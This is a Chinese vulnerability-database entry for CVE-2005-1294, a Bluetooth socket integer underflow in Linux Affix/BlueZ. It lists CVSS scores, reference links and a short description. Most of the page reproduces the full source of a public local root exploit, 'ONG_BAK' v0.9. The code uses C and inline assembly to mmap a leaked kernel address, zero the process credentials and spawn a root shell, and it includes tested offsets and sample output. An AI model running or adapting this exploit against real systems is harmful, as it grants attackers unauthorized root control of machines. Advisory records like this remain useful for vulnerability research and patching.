CVE-2005-1294
CVSS7.2
发布时间 :2005-04-24 00:00:00
修订时间 :2016-10-17 23:18:42
NMCOE    

[原文]The affix_sock_register in the Affix Bluetooth Protocol Stack for Linux might allow local users to gain privileges via a socket call with a negative protocol value, which is used as an array index.


[CNNVD]Nokia Affix 蓝牙协议栈权限提升漏洞(CNNVD-200504-089)

        Affix 是 Nokia 开发的 Linux 下的蓝牙通讯堆栈,基于 GPL 发布。Affix 支持核心蓝牙协议包括:HCI, L2CAP 1.1, L2CAP 1.2, RFCOMM, SDP 等。
        用于Linux的Affix蓝牙协议栈内的affix_sock_register使得本地用户可能通过套接字调用且这种调用带有作为数组索引的负协议值来获取权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1294
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1294
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200504-089
(官方数据源) CNNVD

- 其它链接及资源

http://affix.sourceforge.net/patch_hci_3_2_0
(PATCH)  CONFIRM  http://affix.sourceforge.net/patch_hci_3_2_0
http://marc.info/?l=bugtraq&m=111445064725591&w=2
(UNKNOWN)  BUGTRAQ  20050424 DMA[2005-0423a] - 'Nokia Affix Bluetooth Integer Underflow'
http://www.digitalmunition.com/DMA%5B2005-0423a%5D.txt
(UNKNOWN)  MISC  http://www.digitalmunition.com/DMA%5B2005-0423a%5D.txt

- 漏洞信息

Nokia Affix 蓝牙协议栈权限提升漏洞
高危 未知
2005-04-24 00:00:00 2005-10-20 00:00:00
本地  
        Affix 是 Nokia 开发的 Linux 下的蓝牙通讯堆栈,基于 GPL 发布。Affix 支持核心蓝牙协议包括:HCI, L2CAP 1.1, L2CAP 1.2, RFCOMM, SDP 等。
        用于Linux的Affix蓝牙协议栈内的affix_sock_register使得本地用户可能通过套接字调用且这种调用带有作为数组索引的负协议值来获取权限。

- 公告与补丁

        

- 漏洞信息 (926)

Linux Kernel 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update) (EDBID:926)
linux local
2005-10-26 Verified
0 qobaiashi
N/A [点击下载]
/*

Due to many responses i've improved the exploit
to cover more systems!


  ONG_BAK v0.9   [october 24th 05]
""""""""""""""""""""""""""""""""""""
o universal "shellcode" added
o try to use all possible memory regions
o bugfixes

qobaiashi@voyager:~/w00nf/kernelsploit> ./ong_bak -100222
-|-bluez local root exploit v.0.9  -by qobaiashi-
 |
 |- i've found kernel 2.6.11.4-20a-default
 |- trampoline is at 0x804869c
 |- trying...
 |- [ecx: bf8d0000 ]
 |- suitable value found!using 0xbf8d0000
 |- the time has come to push the button...
sh-3.00# exit






  ONG_BAK v0.3   [april 8th 05]
"""""""""""""""""""""""""""""""""
ong_bak now checks the value of ecx and launches
the exploit in case a suitable value has been found!



  ONG_BAK v0.1   [april 4th 05]
"""""""""""""""""""""""""""""""""

local root exploit for the bluetooth bug

usage:

the bug is quite stable so you can't realy fuck things up
if you stick to the following:

play around with the negative argument until ecx points to 
our data segment:


qobaiashi@voyager:~> ./ong_bak -1002341
-|-local bluez exploit v.0.3  -by qobaiashi-
 |
 |- i've found kernel 2.6.4-52-default
 |- trying...
 |- [ecx: 0b8f0f0f ]
qobaiashi@voyager:~> ./ong_bak -10023411
-|-local bluez exploit v.0.3  -by qobaiashi-
 |
 |- i've found kernel 2.6.4-52-default
 |- trying...
 |- [ecx: 0809da40 ]
 |- suitable value found!using 0x0809da40
 |- the time has come to push the button..
qobaiashi@voyager:~> id
uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users)
qobaiashi@voyager:~>



that's it.
unfortunately it's not yet very practicable..

qobaiashi@u-n-f.com

*/

#include <sys/klog.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <sys/utsname.h>
#include <sys/mman.h>


void usage(char *path);

//===================[ kernel 2.6* privilege elevator ]===============================
//===================[      qobaiashi@u-n-f.com       ]===============================
//globals
int uid, gid;

extern load_highlevel;
__asm__
(
"load_highlevel:         \n"
"xor    %eax, %eax       \n"
"mov    $0xffffe000, %eax\n"
"and    %esp,%eax        \n"
"pushl  %eax             \n"
"call   set_root         \n"
"pop    %eax             \n"
//ret to userspace-2.6.* version
" cli                    \n"
" pushl $0x7b            \n"      //DS user selector
" pop   %ds              \n"
" pushl %ds              \n"      //SS
" pushl $0xc0000000      \n"      //ESP
" pushl $0x246           \n"      //EFLAGS
" pushl $0x73            \n"      //CS user selector
" pushl $shellcode       \n"      //EIP must not be a push /bin/sh shellcode!!
"iret                    \n"
);

void set_root(unsigned int *ts)
{
ts = (int*)*ts;
int cntr;
//hope you guys are int aligned
for(cntr = 0; cntr <= 512; cntr++, ts++)
    if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid)
      ts[0] = ts[1] = ts[4] = ts[5] = 0;

}


void shellcode()
{
system("/bin/sh");
exit(0);
}
//====================================================================================
//====================================================================================





main(int argc, char *argv[])
{
char buf[2048];
int sock, *mod = (int*)buf;
int *linker = 0;

unsigned int arg;
int tmp;
char *check;
struct utsname vers;

gid  = getgid();
uid  = getuid();

printf("-|-bluez local root exploit v.0.9  -by qobaiashi-\n |\n");
if (uname(&vers) < 0)
   printf(" |- couldn't determine kernel version\n");

else
    printf(" |- i've found kernel %s\n", vers.release);
    

printf(" |- trampoline is at %p\n", &load_highlevel);


if (argc < 2)
   {
    usage(argv[0]);
    exit(1);
    }

if (argc == 2)
    arg = strtoul(argv[1], 0, 0);


if (fork() != 0)//parent watch the Oops
   {
    //previous Oops printing
   usleep(1000);
   if ((tmp = klogctl(0x3, buf, 1700)) > -1)
       {
        check = strstr(buf, "ecx: ");
        printf(" |- [%0.14s]\n", check);
        check+=5;
        *(check+9) = 0x00;*(--check) = 'x';*(--check) = '0';
        mod = (unsigned int*)strtoul(check, 0, 0);
        //page align FIXME: might be booggy
        int *ecx = mod;
        mod = (int)mod &~ 0x00000fff;
        linker = 
mmap((void*)mod,0x2000,PROT_WRITE|PROT_READ,MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED,0,0);
        if(linker == mod)//we could mmap the area
          {
           printf(" |- suitable value found!using %p\n", mod);
           printf(" |- the time has come to push the button... \n");
           for (sock = 0;sock <= 1;sock++)          //use ecx
                *(ecx++) = (int)&load_highlevel;   //link to shellcode
           }

           else 
             {
              printf(" |- could not mmap   %p\n", mod);
              if( brk((void*)mod+0x200 ) == -1)
                {
                 printf(" |- could not brk to %p\n", mod);
                 printf(" `-------------------------------\n");
                 exit(-1);
                 }
              //here we did it
              printf(" |- suitable value found!using %p\n", mod);
              printf(" |- the time has come to push the button... \n");
              for (sock = 0;sock <= 1;sock++)          //use ecx
                  *(ecx++) = (int)&load_highlevel;    //link to shellcode

              }
           if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
               exit(1);
                               
        }
   return 0;
   }

if (fork() == 0)//child does the pre-exploit
{
  printf(" |- trying...\n");
  if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
      {
      printf(" |- something went w0rng (invalid value)\n");
      exit(1);
     }
}

exit(0);
}



/*****************\
|**    usage    **|
\*****************/
void usage(char *path)
{
printf(" |----------------------------\n");
printf(" | usage: %s <negative value> \n", path);
printf(" | tested:\n");
printf(" | SuSE 9.1:      -10023411  \n");
printf(" |                -41122122 \n");
printf(" | Kernel 2.6.11: -10023 \n");
printf(" | SuSE 9.3:      -100222\n");
printf(" |                -102901\n");
printf(" `-----------------------\n");
exit(0);
}

// 1st post: milw0rm.com [2005-04-09]

// milw0rm.com [2005-10-26]
		

- 漏洞信息

15783
Affix affix_sock_register() Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local underflow exists in Affix. The 'affix_sock_register()' function fails to perform proper bounds checking resulting in an integer underflow. By supplying a negative protocol value when creating a socket for the 'PF_AFFIX' communication domain, it is possible for a malicious user to gain access to root privileges resulting in a loss of integrity.

- 时间线

2005-04-24 2005-04-16
2005-04-24 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Dmitry Kasatkin has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站